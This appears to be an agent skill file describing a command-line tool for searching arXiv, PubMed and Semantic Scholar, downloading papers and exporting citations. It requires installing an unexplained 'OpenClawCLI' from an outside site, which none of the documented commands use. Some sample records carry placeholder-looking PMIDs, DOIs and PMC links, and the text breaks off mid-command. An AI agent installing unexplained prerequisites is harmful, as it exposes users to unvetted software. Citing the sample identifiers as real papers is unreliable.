---
name: academic-research-hub
description: "Use this skill when users need to search academic papers, download research documents, extract citations, or gather scholarly information. Triggers include: requests to \"find papers on\", \"search research about\", \"download academic articles\", \"get citations for\", or any request involving academic databases like arXiv, PubMed, Semantic Scholar, or Google Scholar. Also use for literature reviews, bibliography generation, and research discovery. Requires OpenClawCLI installation from clawhub.ai."
license: Proprietary
---
# Academic Research Hub
Search and retrieve academic papers from arXiv, PubMed, Semantic Scholar, and Google Scholar. Download PDFs, extract citations, generate bibliographies, and build literature reviews.
⚠️ **Prerequisite:** Install [OpenClawCLI](https://clawhub.ai/) (Windows, macOS)
**Installation Best Practices:**
```bash
# Standard installation
pip install arxiv scholarly pubmed-parser semanticscholar requests
# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install arxiv scholarly pubmed-parser semanticscholar requests
```
**Never use `--break-system-packages`** as it can damage your system's Python installation.
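To confirm that a virtual environment is actually active before running `pip install`, a check along these lines may help. This is a minimal sketch using only the standard library; the helper name `in_virtualenv` is illustrative and not part of this skill.

```python
import sys


def in_virtualenv() -> bool:
    """Return True when the interpreter runs inside a venv-style environment."""
    # Inside a venv, sys.prefix points at the environment directory while
    # sys.base_prefix still points at the base Python installation.
    return sys.prefix != sys.base_prefix


if __name__ == "__main__":
    if in_virtualenv():
        print(f"Virtual environment active: {sys.prefix}")
    else:
        print("No virtual environment detected; consider creating one first.")
```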
---
## Quick Reference
| Task | Command |
|------|---------|
| Search arXiv | `python scripts/research.py arxiv "quantum computing"` |
| Search PubMed | `python scripts/research.py pubmed "covid vaccine"` |
| Search Semantic Scholar | `python scripts/research.py semantic "machine learning"` |
| Download papers | `python scripts/research.py arxiv "topic" --download` |
| Get citations | `python scripts/research.py arxiv "topic" --citations` |
| Generate bibliography | `python scripts/research.py arxiv "topic" --format bibtex` |
| Save results | `python scripts/research.py arxiv "topic" --output results.json` |
---
## Core Features
### 1. Multi-Source Search
Search across multiple academic databases from a single interface.
**Supported Sources:**
- **arXiv** - Physics, mathematics, computer science, quantitative biology, quantitative finance, statistics
- **PubMed** - Biomedical and life sciences literature
- **Semantic Scholar** - Computer science and interdisciplinary research
- **Google Scholar** - Broad academic search (limited support; Google Scholar has no official API)
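When the same query should go to several sources, the command lines can be assembled programmatically. The sketch below only builds argument lists for the three subcommands shown in this document (`arxiv`, `pubmed`, `semantic`); the helper names `build_command` and `build_all` are hypothetical, and no Google Scholar subcommand is assumed because none is documented here.

```python
import shlex
import sys

# Subcommands that appear in this document's examples.
SOURCES = ("arxiv", "pubmed", "semantic")


def build_command(source: str, query: str, *flags: str) -> list[str]:
    """Build the argument list for one scripts/research.py invocation."""
    if source not in SOURCES:
        raise ValueError(f"unknown source: {source!r}")
    return [sys.executable, "scripts/research.py", source, query, *flags]


def build_all(query: str, *flags: str) -> list[list[str]]:
    """Build one command per known source for the same query and flags."""
    return [build_command(source, query, *flags) for source in SOURCES]


if __name__ == "__main__":
    # Print the commands instead of running them.
    for cmd in build_all("graph neural networks", "--max-results", "20"):
        print(shlex.join(cmd))
```

Each list can be passed to `subprocess.run(cmd, check=True)` once the printed commands look right.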
### 2. Paper Download
Download full-text PDFs when available.
```bash
python scripts/research.py arxiv "deep learning" --download --output-dir papers/
```
### 3. Citation Extraction
Extract and format citations from papers.
**Supported formats:**
- BibTeX
- RIS
- JSON
- Plain text
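To illustrate what two of these formats look like, here is a minimal sketch that renders one paper record as BibTeX and as RIS. The record layout (`title`, `authors` in "Last, First" form, `year`) and the function names are assumptions made for illustration; the skill's own output may use a different entry type, citation key, or field set.

```python
def to_bibtex(paper: dict) -> str:
    """Render a paper record as a simple BibTeX @article entry."""
    # Citation key: first author's last name plus year (an arbitrary choice).
    first_last_name = paper["authors"][0].split(",")[0].strip().lower()
    key = f"{first_last_name}{paper['year']}"
    fields = {
        "title": paper["title"],
        "author": " and ".join(paper["authors"]),  # BibTeX separates authors with "and"
        "year": str(paper["year"]),
    }
    body = ",\n".join(f"  {name} = {{{value}}}" for name, value in fields.items())
    return f"@article{{{key},\n{body}\n}}"


def to_ris(paper: dict) -> str:
    """Render a paper record as a simple RIS journal-article entry."""
    lines = ["TY  - JOUR"]
    lines += [f"AU  - {author}" for author in paper["authors"]]  # one AU tag per author
    lines += [f"TI  - {paper['title']}", f"PY  - {paper['year']}", "ER  - "]
    return "\n".join(lines)


if __name__ == "__main__":
    sample = {
        "title": "BERT: Pre-training of Deep Bidirectional Transformers",
        "authors": ["Devlin, J", "Chang, MW", "Lee, K", "Toutanova, K"],
        "year": 2019,
    }
    print(to_bibtex(sample))
    print(to_ris(sample))
```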
### 4. Metadata Retrieval
Get comprehensive metadata for each paper:
- Title, authors, abstract
- Publication date
- Journal/conference
- DOI, arXiv ID, PubMed ID
- Citation count
- References
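One way to hold these fields in code is a small dataclass. The sketch below is a hypothetical schema that mirrors the list above; the attribute names are assumptions and do not necessarily match the keys the script emits in its JSON output.

```python
from dataclasses import asdict, dataclass, field
from typing import Optional


@dataclass
class Paper:
    """Hypothetical container for the metadata fields listed above."""
    title: str
    authors: list[str]
    abstract: str = ""
    published: Optional[str] = None      # ISO date string, e.g. "2017-06-12"
    venue: Optional[str] = None          # journal or conference name
    doi: Optional[str] = None
    arxiv_id: Optional[str] = None
    pubmed_id: Optional[str] = None
    citation_count: Optional[int] = None
    references: list[str] = field(default_factory=list)


if __name__ == "__main__":
    paper = Paper(
        title="Attention Is All You Need",
        authors=["Vaswani et al."],
        published="2017-06-12",
        arxiv_id="1706.03762",
    )
    # asdict() gives a plain dict that json.dumps can serialize.
    print(asdict(paper))
```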
---
## Source-Specific Commands
### arXiv Search
Search the arXiv repository for preprints.
```bash
# Basic search
python scripts/research.py arxiv "quantum computing"
# Filter by category
python scripts/research.py arxiv "neural networks" --category cs.LG
# Filter by date
python scripts/research.py arxiv "transformers" --year 2023
# Download papers
python scripts/research.py arxiv "attention mechanism" --download --max-results 10
```
**Available categories:**
- `cs.AI` - Artificial Intelligence
- `cs.LG` - Machine Learning
- `cs.CV` - Computer Vision
- `cs.CL` - Computation and Language
- `math.CO` - Combinatorics
- `physics.optics` - Optics
- `q-bio.GN` - Genomics
- [Full list](https://arxiv.org/category_taxonomy)
**Output:**
```
1. Attention Is All You Need
Authors: Vaswani et al.
Published: 2017-06-12
arXiv ID: 1706.03762
Categories: cs.CL, cs.LG
Abstract: The dominant sequence transduction models...
PDF: http://arxiv.org/pdf/1706.03762v5
```
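The `PDF:` line carries both the arXiv ID and the version number. A minimal sketch for pulling them apart follows; it handles only new-style identifiers (`YYMM.NNNN` or `YYMM.NNNNN`, in use since April 2007), and the function name `parse_arxiv_pdf_url` is illustrative.

```python
import re
from typing import Optional

# New-style arXiv identifier with an optional "vN" version suffix.
ARXIV_PDF_RE = re.compile(
    r"arxiv\.org/pdf/(?P<id>\d{4}\.\d{4,5})(?:v(?P<version>\d+))?"
)


def parse_arxiv_pdf_url(url: str) -> Optional[tuple[str, Optional[int]]]:
    """Return (arxiv_id, version) from a PDF URL, or None if it does not match."""
    match = ARXIV_PDF_RE.search(url)
    if match is None:
        return None
    version = match.group("version")
    return (match.group("id"), int(version) if version else None)


if __name__ == "__main__":
    print(parse_arxiv_pdf_url("http://arxiv.org/pdf/1706.03762v5"))
```

Old-style identifiers such as `hep-th/9901001` are not matched and return `None`.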
### PubMed Search
Search biomedical literature indexed in PubMed.
```bash
# Basic search
python scripts/research.py pubmed "cancer immunotherapy"
# Filter by date range
python scripts/research.py pubmed "CRISPR" --start-date 2023-01-01 --end-date 2023-12-31
# Filter by publication type
python scripts/research.py pubmed "covid vaccine" --publication-type "Clinical Trial"
# Get full text links
python scripts/research.py pubmed "gene therapy" --full-text
```
**Publication types:**
- Clinical Trial
- Meta-Analysis
- Review
- Systematic Review
- Randomized Controlled Trial
**Output:**
```
1. mRNA vaccine effectiveness against COVID-19
Authors: Smith J, Jones K, et al.
Journal: New England Journal of Medicine
Published: 2023-03-15
PMID: 36913851
DOI: 10.1056/NEJMoa2301234
Abstract: Background: mRNA vaccines have shown...
Full Text: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC9876543/
```
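The PMID and DOI in this output can be turned into stable links. The sketch below assumes the public URL patterns `https://pubmed.ncbi.nlm.nih.gov/<PMID>/` and `https://doi.org/<DOI>`; the helper names are illustrative, and the identifiers in the demo are the sample values from the output above.

```python
from urllib.parse import quote


def pubmed_url(pmid: str) -> str:
    """Build the PubMed landing-page URL for a numeric PMID."""
    if not pmid.isdigit():
        raise ValueError(f"PMID must be numeric, got {pmid!r}")
    return f"https://pubmed.ncbi.nlm.nih.gov/{pmid}/"


def doi_url(doi: str) -> str:
    """Build a doi.org resolver URL, percent-encoding unusual characters."""
    return f"https://doi.org/{quote(doi, safe='/')}"


if __name__ == "__main__":
    print(pubmed_url("36913851"))
    print(doi_url("10.1056/NEJMoa2301234"))
```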
### Semantic Scholar Search
Search computer science and interdisciplinary research.
```bash
# Basic search
python scripts/research.py semantic "reinforcement learning"
# Filter by year
python scripts/research.py semantic "graph neural networks" --year 2022
# Get highly cited papers
python scripts/research.py semantic "transformers" --min-citations 100
# Include references
python scripts/research.py semantic "BERT" --include-references
```
**Output includes:**
- Citation count
- Influential citation count
- Reference list
- Citing papers
- Fields of study
**Output:**
```
1. BERT: Pre-training of Deep Bidirectional Transformers
Authors: Devlin J, Chang MW, Lee K, Toutanova K
Published: 2019
Paper ID: df2b0e26d0599ce3e70df8a9da02e51594e0e992
Citations: 15000+
Influential Citations: 2000+
Fields: Computer Science, Linguistics
Abstract: We introduce a new language representation model...
PDF: https://arxiv.org/pdf/1810.04805.pdf
```
---
## Essential Options
### Result Limits
Control the number of results returned.
```bash
--max-results N # Default: 10, range: 1-100
```
**Examples:**
```bash
python scripts/research.py arxiv "machine learning" --max-results 5
python scripts/research.py pubmed "diabetes" --max-results 50
```
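A range such as 1-100 is straightforward to enforce with `argparse`. The following is a sketch of one way to do it, not the script's actual implementation; `bounded_int` and `build_parser` are hypothetical names.

```python
import argparse


def bounded_int(low: int, high: int):
    """Return an argparse type function that accepts integers in [low, high]."""
    def parse(text: str) -> int:
        try:
            value = int(text)
        except ValueError:
            raise argparse.ArgumentTypeError(f"{text!r} is not an integer") from None
        if not low <= value <= high:
            raise argparse.ArgumentTypeError(
                f"must be between {low} and {high}, got {value}"
            )
        return value
    return parse


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser()
    # Default and range taken from the option description above.
    parser.add_argument("--max-results", type=bounded_int(1, 100), default=10)
    return parser


if __name__ == "__main__":
    print(build_parser().parse_args(["--max-results", "5"]))
```

With this setup, an out-of-range value makes `argparse` print a usage error and exit instead of silently clamping the number.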
### Output Formats
Choose how results are formatted.
```bash
--format <text|json|bibtex|ris|markdown>
```
**Text** - Human-readable format (default)
```bash
python scripts/research.py arxiv "quantum" --format text
```
**JSON** - Structured data for processing
```bash
python scripts/research.py arxiv "quantum" --format json
```
**BibTeX** - For LaTeX documents
```bash
python scripts/research.py arxiv "quantum" --format bibtex
```
**RIS** - For reference managers (Zotero, Mendeley)
```bash
python scripts/research.py arxiv "quantum" --format ris
```
**Markdown** - For documentation
```bash
python scripts/research.py arxiv "quantum" --format markdown
```
### Save to File
Save results to a file.
```bash
--output <filepath>
```
**Examples:**
```bash
python scripts/research.py arxiv "AI" --output results.txt
python scripts/research.py pubmed "cancer" --format json --output papers.json
python scripts/research.py semantic "NLP" --format bibtex --output references.bib
```
### Download Papers
Download full-text PDFs when available.
```bash
--download
--output-dir <directory> # Where to save PDFs (default: downloads/)
```
**Examples:**
```bash
# Download to default directory
python scripts/research.py arxiv "deep learning" --download --max-results 5
# Download to specific directory
python scripts/research.py arxiv "transformers" --download --output-dir papers/nlp/
```
---
## Advanced Features
### Citation Extraction
Extract citations from papers.
```bash
--citations # Extract citations
--citation-format <format> # bibtex, ris, json (default: bibtex)
```
**Example:**
```bash
python scripts/research.py arxiv "attention mechanism" --citations --citation-format bibtex --output citations.bib
```
### Date Filtering
Filter by publication date.
**arXiv:**
```bash
--year <YYYY> # Specific year
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
```
**PubMed:**
```bash
--start-date <YYYY-MM-DD>
--end-date <YYYY-MM-DD>
```
**Examples:**
```bash
python scripts/research.py arxiv "quantum" --year 2023
python scripts/research.py pubmed "vaccine" --start-date 2022-01-01 --end-date 2023-12-31
```
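Before passing dates to `--start-date` and `--end-date`, it can be worth validating them locally. The sketch below uses `datetime.date.fromisoformat` for the `YYYY-MM-DD` form and rejects reversed ranges. The helper names are illustrative, and treating `--year` as equivalent to a January 1 to December 31 range is an assumption about the script's behavior.

```python
from datetime import date


def parse_date_range(start: str, end: str) -> tuple[date, date]:
    """Parse two YYYY-MM-DD strings and check that start is not after end."""
    start_date = date.fromisoformat(start)  # raises ValueError on bad input
    end_date = date.fromisoformat(end)
    if start_date > end_date:
        raise ValueError(f"start date {start} is after end date {end}")
    return start_date, end_date


def year_to_range(year: int) -> tuple[str, str]:
    """Express a whole calendar year as a (start, end) pair of ISO dates."""
    return date(year, 1, 1).isoformat(), date(year, 12, 31).isoformat()


if __name__ == "__main__":
    print(parse_date_range("2022-01-01", "2023-12-31"))
    print(year_to_range(2023))
```

Note that Python 3.11 and later accept additional ISO 8601 spellings in `fromisoformat`, so stricter checking would need an explicit pattern match.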
### Author Search
Search for papers by specific authors.
```bash
--author "Last, First"
```
**Examples:**
```bash
python scripts/research.py arxiv "neural networks" --author "Hinton, Geoffrey"
python scripts/research.py semantic "deep learning" --author "Bengio, Yoshua"
```
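Author names often arrive as "First Last", so a small normalizer can produce the "Last, First" form that `--author` expects. This is a naive sketch: the function name `to_last_first` is illustrative, and it treats the final word as the surname, which is wrong for multi-word surnames.

```python
def to_last_first(name: str) -> str:
    """Convert 'First Last' to 'Last, First'; tidy names already in that form."""
    name = " ".join(name.split())  # collapse repeated whitespace
    if "," in name:
        last, _, first = name.partition(",")
        return f"{last.strip()}, {first.strip()}"
    *given, last = name.split(" ")
    # A single-word name has no given part and is returned unchanged.
    return f"{last}, {' '.join(given)}" if given else last


if __name__ == "__main__":
    for raw in ("Geoffrey Hinton", "Bengio,Yoshua"):
        print(to_last_first(raw))
```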
### Sort Options
Sort results by different criteria.
```bash
--sort-by <relevance|date|citations>
```
**Examples:**
```bash
python scripts/research.py arxiv "machine learning" --sort-by date
python scripts/research.py semantic "NLP" --sort-by citations
```
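The same orderings can be applied to results that were saved earlier with `--format json`. The sketch below assumes each record is a dict with a `published` ISO date string and a `citations` integer; those key names are assumptions, as is the choice of newest-first and most-cited-first ordering.

```python
def sort_papers(papers: list[dict], sort_by: str = "relevance") -> list[dict]:
    """Return a new list ordered by the given criterion."""
    if sort_by == "relevance":
        # Assume the input already arrives in relevance order.
        return list(papers)
    if sort_by == "date":
        # ISO date strings sort chronologically as plain strings.
        return sorted(papers, key=lambda p: p.get("published") or "", reverse=True)
    if sort_by == "citations":
        return sorted(papers, key=lambda p: p.get("citations") or 0, reverse=True)
    raise ValueError(f"unknown sort key: {sort_by!r}")


if __name__ == "__main__":
    sample = [
        {"title": "A", "published": "2021-05-01", "citations": 12},
        {"title": "B", "published": "2023-02-10", "citations": 3},
        {"title": "C", "published": "2019-11-30", "citations": 250},
    ]
    print([p["title"] for p in sort_papers(sample, "date")])
    print([p["title"] for p in sort_papers(sample, "citations")])
```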
---
## Common Workflows
### Literature Review
Gather papers on a topic for a literature review.
```bash
# Step 1: Search multiple sources
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format json --output arxiv_gnn.json
python scripts/research.py semantic "graph neural networks" --max-results 20 --format json --output semantic_gnn.json
# Step 2: Download key papers
python scripts/research.py arxiv "graph neural networks" --download --max-results 10 --output-dir papers/gnn/
# Step 3: Generate bibliography
python scripts/research.py arxiv "graph neural networks" --max-results 20 --format bibtex --output gnn_references.bib
```
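Searching two sources for the same topic usually yields overlapping papers, so a merge step between Step 1 and Step 3 can be useful. The sketch below deduplicates by normalized title and assumes each JSON file holds a list of objects with a `title` key. That layout is an assumption about the script's JSON output, and the function names are hypothetical.

```python
import json
from pathlib import Path


def normalize_title(title: str) -> str:
    """Lowercase and collapse whitespace so near-identical titles compare equal."""
    return " ".join(title.lower().split())


def merge_results(*result_sets: list[dict]) -> list[dict]:
    """Combine result lists, keeping the first record seen for each title."""
    seen: set[str] = set()
    merged: list[dict] = []
    for results in result_sets:
        for paper in results:
            key = normalize_title(paper["title"])
            if key not in seen:
                seen.add(key)
                merged.append(paper)
    return merged


def load_results(path: str) -> list[dict]:
    """Read one saved result file (assumed to be a JSON list of records)."""
    return json.loads(Path(path).read_text(encoding="utf-8"))
```

For the files from Step 1, this would be called as `merge_results(load_results("arxiv_gnn.json"), load_results("semantic_gnn.json"))`. Matching on DOI or arXiv ID where available would be more robust than title matching.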
### Finding Recent Research
Track the latest papers in a field.
```bash
# Papers from 2023, newest first
python scripts/research.py arxiv "large language models" --year 2023 --sort-by date --max-results 30
# Biomedical papers from November 2023
python scripts/research.py pubmed "gene therapy" --start-date 2023-11-01 --end-date 2023-11-30 --format markdown --output recent_gene_therapy.md
```
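The hard-coded dates above go stale quickly. A small helper can compute the previous calendar month relative to any given day and produce values suitable for `--start-date` and `--end-date`. This is a standard-library sketch; the function name `previous_month_range` is illustrative.

```python
from datetime import date, timedelta


def previous_month_range(today: date) -> tuple[str, str]:
    """Return (first_day, last_day) of the month before `today` as ISO strings."""
    first_of_this_month = today.replace(day=1)
    # Stepping back one day from the 1st lands on the previous month's last day.
    last_of_previous = first_of_this_month - timedelta(days=1)
    first_of_previous = last_of_previous.replace(day=1)
    return first_of_previous.isoformat(), last_of_previous.isoformat()


if __name__ == "__main__":
    start, end = previous_month_range(date.today())
    print(f"--start-date {start} --end-date {end}")
```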
### Highly Cited Papers
Find influential papers in a field.
```bash
python scripts/research.py semantic "reinforcement learning" --min-citations 500 --sort-by citations --max-results
... (truncated)